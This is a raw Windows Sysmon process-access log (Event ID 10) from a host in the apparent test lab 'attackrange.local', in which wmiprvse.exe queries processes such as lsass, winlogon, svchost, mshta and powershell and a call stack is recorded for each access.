15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2D06-00000000A301}5924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2C06-00000000A301}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2B06-00000000A301}7316C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2A06-00000000A301}1324C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.460{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 